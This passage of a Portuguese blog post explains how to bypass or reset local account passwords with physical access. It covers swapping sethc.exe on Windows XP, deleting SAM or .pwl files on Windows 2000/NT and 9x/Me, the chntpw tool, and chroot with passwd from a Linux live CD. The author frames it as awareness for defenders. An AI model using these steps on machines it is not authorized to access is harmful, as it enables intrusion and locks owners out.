algumas dicas de como se proteger disso, como evitar ter sua senha do Windows roubada, etc. Infelizmente, a melhor proteção é a proteção física.Nota importante: no Windows XP, se a listagem de usuários estiver ativa no logon, ao segurar SHIFT por 8 segundos, o prompt de comando (o novo arquivo "sethc.exe") poderia ficar por trás dela, e você não o veria. Para vê-lo, tecle duas vezes seguidas CTRL + ALT + DEL, isso ativa temporariamente o logon clássico. Se não aparecer da primeira vez, solte e segure SHIFT direita por mais oito segundos (ou mais, se seu cristal de quartzo cerebral não gerar os ciclos corretamente... rs).Windows 2000 e NT 4.0Rapidinho: apague os arquivos SAM e SAM.LOG da pasta "C:\WINNT\system32\config". Todas as contas de usuários serão excluídas, e a senha de administrador será vazia. Bastará digitar "Administrador" no campo do nome de usuário, deixar sem senha e depois alterá-la pelas vias normais. Comentei aqui no Explorando, logo no comecinho do blog (em 2005):http://janelasepinguins.blogspot.com/2005/10/hackeando-as-senhas-no-windows-2000.htmlApesar das contas serem excluídas, os arquivos dos usuários não serão, eles ficarão na pasta "C:\Documents and settings". Pode ser ruim se o sistema tiver muitas contas, pois você precisará recriar uma por uma :(, reinstalar alguns programas, reconfigurar diversas coisas... E pode ser terrível em sistemas alheios: como a senha será redefinida, o proprietário não conseguirá mais fazer logon. No Windows XP isso não funciona: sem os arquivos SAM e SAM.LOG, o sistema simplesmente se recusa a iniciar, exibe uma mensagem de erro e a única saída é reiniciar - reiniciando, ele repete o processo, ou seja, reinicia novamente... Ponto para a galerinha do Tio Bill, mas infelizmente não corrigiram isso no Service Pack 4 do Windows 2000.Windows 95/98/MeSe é que se pode chamar isso de senha, basta apagar os arquivos de extensão ".pwl", na pasta do Windows. Fazendo isso, a senha do usuário será vazia, e qualquer um que entrar poderá definir uma nova senha. Assim como ocorre ao fazer o processo para o Windows NT/2000, o dono perderá a senha dele, e não conseguirá fazer logon. O arquivo a ser apagado leva o nome do usuário, por exemplo, "Mah.pwl". As senhas no Windows 9x/Me não são para proteção, nunca foram. Servem apenas como um meio de identificar as diversas contas de usuário, para efeitos de personalização. No Windows 9x/Me, qualquer um pode alterar qualquer arquivo de sistema, inclusive fazer logon usando uma conta padrão, apenas clicando em "Cancelar" na tela de logon. Os perfis de usuário apenas controlam a aparência das telas, papel de parede, personalizações dos programas que sejam gravadas na chave HKEY_CURRENT_USER do registro, etc.Nota: apesar de o Windows 9x/Me não possuírem sistemas de proteção a arquivos e dados do sistema baseando-se em contas e privilégios, como ocorre na família do Windows NT, é possível impor diversas restrições usando bloqueios configuráveis via registro; para isso pode-se usar utilitários inclusos no CD do Windows 98 original, ou programas de terceiros, como o freeware e brasileiro WinPolicy.Opções alternativasAlém desses meios de apagar arquivos, pode-se tentar outras coisas... Como programas de quebra de senha que testam todas as possibilidades, como o Proactive Password Auditor, também já comentado aqui:http://janelasepinguins.blogspot.com/2007/02/dica-como-hackear-senha-do.htmlHá um antigo, o LopthCrack, algo assim, mas não o encontrei em nenhum lugar na Internet... Que fazia a mesma coisa, ou seja, tentava descobrir as senhas. Até porque os métodos de trocar ou apagar arquivos do Windows não permitem descobrir a senha, eles permitem redefini-las (no caso do Windows 9x/Me/NT/2000) ou obter acesso sem senha, podendo criar uma conta com direitos administrativos ou alterar as senhas dos outros usuários (no caso do Windows XP/2003).Além disso, o Roberto Bechtlufft, um leitor do Explorando, indicou um programa para Linux, que tenta alterar as senhas no Windows: "chntpw". Pelo nome deve querer dizer "Change NT Password", e pode ser instalado nas distribuições derivadas do Debian usando o apt-get: apt-get install chntpw. Veja um breve tutorial em:http://www.linuxparaoresgate.com/tecnico/resetando_senhas_windows.htmlE no Linux?Pois bem... Tão fácil como no Windows (ou até mais ainda!), pelo menos funciona com a grande esmagadora maioria das distribuições. Basta dar boot com um live-CD e obter acesso de root rodando do CD. A partir daí, monte a partição onde o Linux está instalado no HD, abra um prompt de comando (como root) e digite chroot /mnt/hda1, trocando /mnt/hda1 pelo ponto de montagem da partição do sistema a ter a senha alterada. Dessa forma obtém-se um prompt do sistema que está no HD, com direitos de root; isso quer dizer que você pode fazer o que quiser! Para trocar a senha de root, digite passwd, tecle [enter] e então entre com a nova senha. Para trocar a senha de alguma conta sem ser a de root, digite passwd seguido pelo nome do usuário. Postei um texto maior, explicando melhor isso, aqui:http://janelasepinguins.blogspot.com/2007/04/hackeando-as-senhas-no-linux.htmlO chroot é uma ferramenta muito útil em manutenção, sem contar na personalização de live-CDs. Mas em mãos erradas, pode ser uma desgraça também!ConcluindoUma questão que fica no ar para usuários não tão experientes é: "como apagar ou trocar os arquivos, se não temos acesso ao sistema?". Realmente, muitas vezes nem tendo acesso é possível. Por exemplo, no caso do Windows 2000/NT onde não dá para apagar o SAM, que fica aberto e bloqueado. E no XP/2003, não dá para substituir o "sethc.exe" usando uma conta restrita numa partição NTFS, pois, apesar de o "sethc.exe" não ficar aberto o tempo todo e poder ser apagado, um usuário limitado não tem direito a escrita (e, conseqüentemente, a "apagamento") na pasta do Windows (mas se o HD estiver formatado em FAT/FAT32, um usuário limitado pode facilmente trocar o "sethc.exe", usando o próprio Explorer). A forma mais comum, para os casos em que os arquivos não têm como ser trocados usando o sistema que será alvo do ataque, é usar um outro sistema. O acesso físico, local, é uma desgraça mesmo... Como o Carlos Morimoto disse em outras palavras no seu livro Redes e Servidores Linux: "Se um usuário der boot com um live-CD no seu servidor, o servidor já não será mais seu; será dele". Pois bem, basta usar um sistema que rode do CD e que reconheça, com suporte a escrita, a partição onde o sistema estiver instalado. Isso pode ser feito com o Kurumin Linux 7, que inclui o NTFS-3g, bastando apenas ativar o suporte a leitura e escrita clicando no respectivo ícone no "Meu computador". Ou até mesmo com o Windows que roda do CD, que já até comentei aqui no Explorando, e também publiquei no GdH:www.guiadohardware.net/artigos/windows-roda-cdEsses métodos de quebrar as senhas só têm valor localmente, pois um controlador de domínio poderá exigir autenticação se o computador estiver em rede, e puxará a listagem de usuários do servidor (e não da máquina local). Algo parecido ocorre quando o micro que a pessoa acessa não é uma estação de trabalho, mas sim um "terminal burro", que apenas puxa imagens de um servidor; neste caso as senhas e os programas estão no servidor, e ao dar boot com um live-CD o usuário poderia até se decepcionar com a falta do HD :) Dessa forma, de nada adiantará tentar quebrar a proteção das contas locais; isso vale para o Windows 95, 98, Me, 2000, XP, NT, Vista, 2003 e até mesmo para o Linux. Por outro lado... Se o servidor de uma rede local for o Windows Server 2003 (ou o 2000 Server, talvez), sem mínimas proteções físicas (gabinete trancado, sem drives de CD-DVD nem USB, câmeras de vigilância, etc), um funcionário engraçadinho (e com conhecimento) poderia quebrar as senhas de Administrador do servidor, alterar as configurações e mandar pro espaço a segurança da rede. Com que objetivos? Ele quer roubar a empresa? Descobrir dados sigilosos? Não, muitas vezes é uma intenção das mais banais possíveis: acessar bate-papo, sites de relacionamentos e páginas pornôs nos micros de trabalho. No servidor não é qualquer um que se atreveria a mexer, mas quanto mais proteção, melhor.Cuidado: redefinir a senha de um usuário que possua arquivos criptografados em partições NTFS irá inutilizar permanentemente tais arquivos (pelo menos, em teoria, pois nada parece tão certo quando se trata de Windows...). Para alterar as senhas sem perder os arquivos criptografados, deve-se alterá-la usando o recurso de "troca de senha", logado com a conta que terá a senha alterada.Use isso tudo com responsabilidade. Deixo aqui um parágrafo da matéria que publiquei no GdH, para não reescrever a mesma coisa novamente:Algumas pessoas particularmente me criticam por escrever “dicas” com este teor. Em meio a tantos agradecimentos e comentários, recebi algumas críticas de revoltados com um texto que escrevi há um tempo sobre criação de vírus (http://janelasepinguins.blogspot.com/2006/08/dica-como-criar-um-vrus.html). Não nego que tive um gostinho de atrair lammers, me divirto com as pessoas que acham que sabem de tudo só por seguirem uma receita que mal entendem como funciona. Lá na frente, um dia, elas têm que encarar uma situação e se ferram. Mas muita gente reconheceu o lado importante da matéria (como os vírus são criados, como agem, como se defender, o que fazer, etc). Provavelmente receberei críticas quanto a este texto, mas os que criticam negativamente são usuários que vão contra o bem comum, ao compartilhamento da informação. Matei a cobra e mostrei o pau, “travei o pc mas mostrei no gerenciador de processos quem foi o culpado”. Quanto mais esta informação for divulgada, mais gente se cuidará e, de certa forma, pressionará a empresa produtora do Windows a rever algumas coisas nos seus sistemas antes de soltá-los. Vai dizer que o Tio Bill não sabia que durante a tela de logon a conta usada possui privilégios administrativos? Tudo bem, errar é humano. Antes divulgar esta informação de forma clara e técnica e permitir que mais técnicos e profissionais de TI se mexam para proteger os sistemas dos seus clientes, do que não divulgá-la, ocultá-la. Ela não ficará oculta, um passa para o outro, e se nada for feio para tentar proteger os sistemas, muitos espertinhos se aproveitarão desse mole que o Windows dá. Alunos em escolas e bibliotecas, clientes em lan houses, funcionários em empresas, e até mesmo - porque não? - o seu filho, no seu computador.Ou seja, use, mas use com responsabilidade. Mesmo que não usar, é bom saber, no mínimo, para saber proteger o seu Windows e o seu computador.Agora, para completar a coleção só falta descobrirmos um meio de obter acesso privilegiado no Windows Vista! Afinal, até no pingüim é moleza, como mostrei com o chroot. É... Quando se tem acesso local a um computador relativamente "não seguro", as senhas e nada podem ser a mesma coisa ;)